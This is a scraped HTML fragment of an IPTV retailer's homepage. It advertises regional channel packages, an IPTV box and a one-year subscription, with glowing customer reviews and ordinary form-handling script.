src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/12/155237154835003.png" alt=""> </div> <span>Middel East&Asia</span> </div> </div> <div class="ad-content"> <div class="ad-content-box"> <div class="ad-content-description"> <p>The US classification including ABC,CBS,CNN,ESPN,FOX,HBO,NBA,TNT,etc TOP channels.</p> <p>The Canada classification including CBC,CTV,City,SportsNet,TSN,etc TOP channels, and RDI,RDS,V-Montreal, etc french canadian channels </p> <p>The Brazil classification including Globol, HBO, FOX, ESPN, Band, Sports TV, etc TOP channels</p> </div> <ul class="ad-content-classify"> <li>United States</li> <li>Canada</li> <li>Brazil</li> </ul> <div class="ad-content-list-box"> <div class="ad-content-list owl-carousel"> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/North+America-10.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/16/155272741562723.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/North+America-10.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/16/155272785874108.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/North+America-10.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/16/155272819613961.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/North+America-10.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/16/155272877066117.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/North+America-10.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/16/155272920083840.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/North+America-10.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/16/155272944113074.jpg" alt=""/> </a> </div> </div> <div class="ad-content-list owl-carousel"> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/North+America-10.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155289067574496.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/North+America-10.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155289067691337.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/North+America-10.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155289067634129.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/North+America-10.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155289067663761.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/North+America-10.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155289067664049.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/North+America-10.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155289067715821.jpg" alt=""/> </a> </div> </div> <div class="ad-content-list owl-carousel"> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/South+America-11.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155289318768462.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/South+America-11.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155289318792492.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/South+America-11.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155289318834535.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/South+America-11.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155289318880416.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/South+America-11.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155289318858974.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/South+America-11.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155289318867323.jpg" alt=""/> </a> </div> </div> </div> </div> <div class="ad-content-box"> <div class="ad-content-description"> <p>The UK classification including BBC, BT Sports, ITV, Sky, CBS, etc TOP channels</p> <p>The France classification including AB, BeIN, Canal, Cine, France, SFR Sport, etc TOP channels</p> <p>The German classification including Kabel, ProSieben, RTL, Sky, TNT, Disney, etc TOP channels</p> <p>The Italy classification including Premium, Rai, Sky, Canale, Fox, etc TOP channels</p> <p>The Italy classification including MovieStar, 24 Horas, DeCasa, Divinity, LA, etc TOP channels</p> <p>The Portugal classification including AXN, Benfica, Fox, RTP, Sport TV, TV Cine, etc TOP channels</p> </div> <ul class="ad-content-classify"> <li>United Kingdom</li> <li>France</li> <li>German</li> <li>Italy</li> <li>Spain</li> <li>Portugal</li> </ul> <div class="ad-content-list-box"> <div class="ad-content-list owl-carousel"> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155291217296901.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155291217222704.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155291217244546.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155291217384313.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155291217360617.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.htmll" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155291217370553.jpg" alt=""/> </a> </div> </div> <div class="ad-content-list owl-carousel"> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155291225695954.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155291225612266.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155291225623970.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155291225745077.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155291225712739.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/18/155291225718956.jpg" alt=""/> </a> </div> </div> <div class="ad-content-list owl-carousel"> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298731838635.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298731898422.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298731875551.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298731867124.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298731856543.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298731842970.jpg" alt=""/> </a> </div> </div> <div class="ad-content-list owl-carousel"> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298740948561.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298740951461.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298740941142.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298740960659.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298740993848.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298740998839.jpg" alt=""/> </a> </div> </div> <div class="ad-content-list owl-carousel"> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298731987315.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298731997595.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298731955011.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298731938543.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298731968467.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298731910568.jpg" alt=""/> </a> </div> </div> <div class="ad-content-list owl-carousel"> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298732928176.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298732930451.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298733088618.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298733086134.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298733014786.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Europe-12.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/19/155298733083742.jpg" alt=""/> </a> </div> </div> </div> </div> <div class="ad-content-box"> <div class="ad-content-description"> <p>The Arabic classification including Bein, OSN, MBC,Jazeera ,Alkass ,etc Many Arabic Countries 's TOP channels.</p> <p>The Asia classification including China, Taiwan, HongKong, Japan, Korea, Malaysia, etc Many Countries 's TOP channels.</p> </div> <ul class="ad-content-classify"> <li>Arabic</li> <li>Asia</li> </ul> <div class="ad-content-list-box"> <div class="ad-content-list owl-carousel"> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Arabic-13.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/22/155323712927161.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Arabic-13.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/22/155323712982991.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Arabic-13.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/22/155323712930642.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Arabic-13.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/22/155323712931682.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Arabic-13.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/22/155323712924668.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Arabic-13.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/22/155323713037720.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Arabic-13.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/22/155323713082737.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Arabic-13.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/22/155323713084836.jpg" alt=""/> </a> </div> </div> <div class="ad-content-list owl-carousel"> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Asia+-14.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/22/155323884116063.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Asia+-14.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/22/155323884187895.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Asia+-14.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/22/155323884157105.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Asia+-14.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/22/155323884261579.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Asia+-14.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/22/155323884212654.jpg" alt=""/> </a> </div> <div class="ad-content-lists"> <a href="https://www.worldtvmall.com/p/Asia+-14.html" target="_blank"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/03/22/155323884223890.jpg" alt=""/> </a> </div> </div> </div> </div> </div> </div> <div class="event"> <div class="container"> <h2 class="title">Latest News</h2> <div class="row"> <div class="col-md-9"> <div class="owl-carousel" id="owl-demo3"> <div class="event-list"> <div class="row"> <div class="col-md-5"> <div class="img-box"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/01/14/154745008080982.jpg.300x300.jpg" alt="" /> </div> </div> <div class="col-md-7"> <div class="time">2019-01-09</div> <h2 class="event-title"><a target="_blank" href="/article/north_america-14.html">North America Channels List</a></h2> <p class="event-describe">US : including ABC,CBS,CNN,ESPN,FOX,HBO,NBA,TNT,etc TOP channels. Canada: including CBC,CTV,City,SportsNet,TSN,etc TOP channels, and RDI,RDS,V-Montreal, etc french canadian channels</p> </div> </div> </div> <div class="event-list"> <div class="row"> <div class="col-md-5"> <div class="img-box"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/01/14/154745008036334.jpg.300x300.jpg" alt="" /> </div> </div> <div class="col-md-7"> <div class="time">2019-01-10</div> <h2 class="event-title"><a target="_blank" href="/article/South-America-Channels-List-15.html">South America Channels List</a></h2> <p class="event-describe">The Brazil classification including Globol, HBO, FOX, ESPN, Band, Sports TV, etc TOP channels</p> </div> </div> </div> <div class="event-list"> <div class="row"> <div class="col-md-5"> <div class="img-box"> <img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/01/14/154745007939168.jpg.300x300.jpg" alt="" /> </div> </div> <div class="col-md-7"> <div class="time">2019-01-10</div> <h2 class="event-title"><a target="_blank" href="/article/Europe-Channels-List-16.html">Europe Channels List</a></h2> <p class="event-describe"></p> </div> </div> </div> </div> </div> <div class="col-md-3"> <div class="event-btn"> <a href="/articles/index.html">View All</a> </div> </div> </div> </div> </div> <div class="comment"> <h2 class="title">Customer Reviews</h2> <div class="container"> <div class="owl-carousel" id="owl-demo2"> <div class="comment-content"> <div class="comment-head"> <div class="star"> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> </div> <div class="time">2019/04/12</div> </div> <h2><a href="/product/wtvpro-61.html" target="_blank">WorldTV IPTV Box With 1600+ Live TV Channels Free to Watch</a></h2> <p>I have been using other android app for live streaming TV but this IP TV is awesome to watch US as well as other overseas Chanel. Great quality and also having couple HD Chanel there to watch !! I connected in LAN cable via HDMI in TV and works perfectly fine and no issue !! This IP tv is bang as it’s also having couple premium Chanel like HBO and showtime !! So far freaking awesome and no complain at this moment !!</p> <span>****</span> </div> <div class="comment-content"> <div class="comment-head"> <div class="star"> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> </div> <div class="time">2019/04/08</div> </div> <h2><a href="/product/wtvpro-61.html" target="_blank">WorldTV IPTV Box With 1600+ Live TV Channels Free to Watch</a></h2> <p>I buy it for my kid, he like to watch carton in this box , and I am happy that my kid like it .</p> <span>****</span> </div> <div class="comment-content"> <div class="comment-head"> <div class="star"> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> </div> <div class="time">2019/03/28</div> </div> <h2><a href="/product/wtvpro-61.html" target="_blank">WorldTV IPTV Box With 1600+ Live TV Channels Free to Watch</a></h2> <p>I wanted to get this for my self so I can watch ESPN channels live,There are a handful of English language channels, including some new channels like CBC, CNN, BBC, TNT, Disney, Nickelodeon, Food, Travel, National Geographic, Discovery, History, etc., which is pretty cool, if you have babes at home you can set it up and play all day im very sure kid will be watching all day with out making a noises. The setup is pain less !!!! plug HDMI to your TV, Power adapter to the wall ! remote power on!!! go to the main app and turn on ! With millions of channel, your selection is endless. I had this with me now, im in HK hotel and I plug this in to watch USA ESPN ! PLUS " good stuff" ! I dont need to pay hotel for extra TV show ! Over all Im happy with ESPN on the go with me !! I'll update every 6 month to let the people know how this company go!</p> <span>****</span> </div> <div class="comment-content"> <div class="comment-head"> <div class="star"> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> </div> <div class="time">2019/03/21</div> </div> <h2><a href="/product/wtvpro-61.html" target="_blank">WorldTV IPTV Box With 1600+ Live TV Channels Free to Watch</a></h2> <p>thanks alot we are very encouraged by your product it is far superior to the iptv we have been testing for 6 months</p> <span>****</span> </div> <div class="comment-content"> <div class="comment-head"> <div class="star"> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> </div> <div class="time">2019/03/12</div> </div> <h2><a href="/product/wtvpro-61.html" target="_blank">WorldTV IPTV Box With 1600+ Live TV Channels Free to Watch</a></h2> <p>It works great, on both on hardwired or Wifi connections. There is plenty of storage space inboard, including slots for a USB flash drive and mini SD card. The remote control seems to be simple and easy to use, and you can also purchase a mini android keyboardmouse and it helps with the functionality. I would definitely recommend this product!</p> <span>****</span> </div> <div class="comment-content"> <div class="comment-head"> <div class="star"> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> </div> <div class="time">2019/02/26</div> </div> <h2><a href="/product/WorldTV-IPTV-One-Year-IPTV-Subscription-1600%2B-Channels-63.html" target="_blank">WorldTV IPTV One Year IPTV Subscription 1600+ Channels</a></h2> <p>Seller sent APK to me very fast. The operation is very simple and the whole is smooth.Now I can see all the channels on my Android phone.</p> <span>****</span> </div> <div class="comment-content"> <div class="comment-head"> <div class="star"> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> </div> <div class="time">2019/02/27</div> </div> <h2><a href="/product/wtvpro-61.html" target="_blank">WorldTV IPTV Box With 1600+ Live TV Channels Free to Watch</a></h2> <p>It was shipped quickly.Thank you</p> <span>****</span> </div> <div class="comment-content"> <div class="comment-head"> <div class="star"> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> </div> <div class="time">2019/02/19</div> </div> <h2><a href="/product/WorldTV-IPTV-One-Year-IPTV-Subscription-1600%2B-Channels-63.html" target="_blank">WorldTV IPTV One Year IPTV Subscription 1600+ Channels</a></h2> <p>Excellent support, very easy to install and watch all channel on my android mobile phone.</p> <span>****</span> </div> <div class="comment-content"> <div class="comment-head"> <div class="star"> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> </div> <div class="time">2019/02/20</div> </div> <h2><a href="/product/wtvpro-61.html" target="_blank">WorldTV IPTV Box With 1600+ Live TV Channels Free to Watch</a></h2> <p>Very good product! Works very well.</p> <span>****</span> </div> <div class="comment-content"> <div class="comment-head"> <div class="star"> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> </div> <div class="time">2019/02/16</div> </div> <h2><a href="/product/wtvpro-61.html" target="_blank">WorldTV IPTV Box With 1600+ Live TV Channels Free to Watch</a></h2> <p>Good</p> <span>****</span> </div> </div> </div> </div> </div> <!--footer start--> <div class="footer"> <div class="foot-content"> <ul class="row"> <li class="col-md-3"> <a class="foot-logo" href="/" title="home"><img src="/uploads/sy18127092301/2019/01/14/154744839724300.png" alt="Best Smart IPTV Box Channels - WorldTV Official Website"/></a> <p class="foot-text"></p> </li> <li class="col-md-6"> <div class="col-md-4"> <h2>COMPANY</h2> <ul class="clearfix"> <li><a href="/p/About-Us-1.html" target="_blank">About Us</a></li> <li><a href="/p/CONTACT-2.html" target="_blank">CONTACT</a></li> </ul> </div> <div class="col-md-4"> <h2>SUPPORT</h2> <ul class="clearfix"> <li><a href="/p/Shipping-%26-Payment-3.html" target="_blank">Shipping & Payment</a></li> <li><a href="/p/Refund-%26-Exchange-4.html" target="_blank">Refund & Exchange</a></li> <li><a href="/p/Warranty-5.html" target="_blank">Warranty</a></li> <li><a href="/p/Privacy-Policy-6.html" target="_blank">Privacy Policy</a></li> </ul> </div> <div class="col-md-4"> <h2>Contact Us</h2> <ul> <li><em class="fa fa-home"></em>World TV Corporation</li> <li><em class="fa fa-map-marker"></em>https://www.worldtvmall.com</li> <li><em class="fa fa-envelope-o"></em>Email: [email protected]</li> </ul> </div> </li> <li class="col-md-3"> <h2>Subscribe</h2> <p class="subscribe-text">Be the first to know about our latest products</p> <form id="subscriptionForm" role="flform" action="/site/add-subscripter.html" afterSubmit="ajaxAfterSubscriptionSubmit" > <input type="text" name="email" id="subscriptUserEmail" placeholder="Your email address" /> </form> <button id="subscriptionBtn">Subscribe</button> <div class="follow clearfix"> <a href="https://www.facebook.com/WorldTVTech" target="_blank" rel="nofollow"> <i class="flk-share-icon-facebook" alt="facebook"></i> </a> <a href="https://twitter.com/3213213" target="_blank" rel="nofollow"> <i class="flk-share-icon-twitter" alt="twitter"></i> </a> </div> </li> </ul> </div> <div class="foot-bottom"> <div class="copyright">Copyright © World TV Corporation</div> <div id="paymentImg"> <img src="/uploads/sy18127092301/2019/01/08/154690954578111.png"/></div> <div class="payments"> <!--shipping img start--> <img src="/uploads/sy18127092301/2019/01/08/154691343380768.jpg"/> <!---shipping img end--> </div> </div> </div> <!--footer end--> <!--第三方客服--> <div class="side"> <ul style="margin:0;"> <li class="customerServiceType relative"> <a href="mailto:[email protected]"> <img src="/uploads/www/2017/09/01/150423272090727.png" alt="Email" style="width:45px;height:45px;"> </a> <div class="absolute customerServiceType-email" id="customerServiceTypeEmail">[email protected]</div> </li> <li class="customerServiceType relative"> <a href="skype:[email protected]?chat" target="_blank"> <img src="/statics/themes/base/img/skype.png" alt="skype" style="width:45px;height:45px;"> </a> </li> </ul> <div id="btmFixedBox"> <div class="item" id="MessageBoard"> <button class="iconfont icon-shouye-liuyanban" style="font-size:28px;"></button> </div> <div class="item" id="btmScrollTop"> <button class="fa fa-chevron-up"></button> </div> </div> <div class="arrows"><i class="fa fa-chevron-right"></i></div> </div> <!--留言板 start--> <div class="message-board"> <form role="flform" action="/site/add-visiter-msg.html" method="post" id="messageboardcommentform" beforeSubmit="ajaxMessageboardBeforeAddVisiterMsgSubmit" afterSubmit="ajaxMessageboardAfterAddVisiterMsgSubmit" class="index_msg_form"> <p><input type="text" id="messageboardname" name="name" value="" placeholder="Name" /></p> <p><input type="text" id="messageboardemail" name="email" value="" placeholder="Email" /></p> <p><textarea cols="30" name="content" id="messageboardcontent" rows="4" placeholder="Leaving a message." data-validation-required-message="Please enter your message" minlength="5" data-validation-minlength-message="Min 5 characters" maxlength="999" style="resize:none"></textarea></p> <!-- <p><div class="g-recaptcha" data-sitekey="6Ld9pHUUAAAAANUzim_ZwHJDiXfTSqruitJQBY-M"></div></p>--> <p class="cade_img"> <input type="text" name="verifyCode" placeholder="Verification Code"> <span> <a href="javascript:;" id="messageboardrefreshCapchBtn"> <img style="cursor:pointer;width:105px;height:40px;" src="/site/captcha.html"> </a> </span> </p> <input type="submit" id="messageboardaddress-btn" value="Submit Message" class="s-btn-blue"/> </form> </div> <!--留言板 end--> <script src="/statics/themes/base/js/vendor/jquery-1.12.0.min.js"></script> <script type="text/javascript"> function ajaxMessageboardBeforeAddVisiterMsgSubmit(){ if ($('#messageboardcontent').val() == '' || $('#messageboardemail').val() == '') { FLFunctions.alertConent('Mailbox and message content cannot be empty'); return false; } return true; } function ajaxMessageboardAfterAddVisiterMsgSubmit(data){ if(data.status==1){ setTimeout(function(){ FLFunctions.alertConent('Send successfully'); },200); }else{ FLFunctions.alertConent(data.msg==""?"操作失败":data.msg); } } $("#messageboardaddress-btn").bind("click",function(){ $("#messageboardformsite").submit(); }) $("#messageboardrefreshCapchBtn").bind("click",function(){ messageboardrefreshCapch(); }) $("#btmScrollTop").bind("click", function(){ $("html").animate({ scrollTop : 0 }, 300); }) function messageboardrefreshCapch(){ $.get("/site/captcha.html?refresh=1",{},function(data){ $("#messageboardrefreshCapchBtn img").attr("src",data.url); },"json") } </script><!--广告弹框--> <!-- 纯广告弹框 --> <a href="" class="theme-button adsenseJumpFormModelClick" data-toggle="modal" data-target="#adsenseJumpFormModal" style="display:none;"></a> <div class="modal fade" id="adsenseJumpFormModal" tabindex="-1" role="dialog" style="height: auto;"> <div class="modal-dialog hhg-scrollbar" role="document" style="height: auto;"> <div class="modal-content" style="height: auto;"> <!--account area start--> <div class="vedio-dialog row"> <div class="login-img-box col-sm-12"> <div> <a href="https://www.baidu.com" target="_blank"><img src="https://www.worldtvmall.com/uploads/sy18127092301/2019/01/15/154752030488824.jpg" class="img-responsive" alt=""/></a> <i class="fa fa-close"></i> </div> </div> </div> <!--account area end--> </div> </div> </div> <!-- 纯广告弹框 end--> <!--订阅弹框--> <a href="" class="theme-button subscibeJumpFormModelClick" data-toggle="modal" data-target="#subscibeJumpModal" style="display:none;"></a> <div class="modal fade" id="subscibeJumpModal" tabindex="-1" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-body"> <button class="close" data-dismiss="modal" aria-hidden="true" style="z-index:1;"><i class="fa fa-close"></i></button> <!--account area start--> <div class="subscribe-dialog row"> <div class="login-img-box col-sm-12"> <div class="title"> <h4 style="text-transform: capitalize;">Welcome To Subscribe</h4> <span>Access exclusive offers, news, and more.</span> </div> <form 